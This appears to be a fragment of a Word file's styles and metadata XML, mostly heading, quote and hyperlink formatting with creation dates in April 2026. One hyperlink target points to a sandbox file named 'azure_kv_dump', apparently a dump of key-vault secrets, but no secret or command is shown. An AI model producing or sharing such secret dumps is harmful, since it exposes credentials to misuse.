      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00371A2F"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>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1C68E0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>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46162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6162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162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162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162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2F"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Aptos" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="002060"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="001C68E0"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Aptos" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0070C0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="26"/>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46162E"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="0046162E"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="0046162E"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading8Char">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="0046162E"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="0046162E"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="0046162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62E"/>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4616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162E"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Aptos"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0046162E"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="0046162E"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00461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62E"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Aptos"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="0046162E"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0046162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sandbox://mnt/data/azure_kv_dump.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1896</Words>
  <Characters>10811</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>90</Lines>
  <Paragraphs>25</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-06T04:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-06T05:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>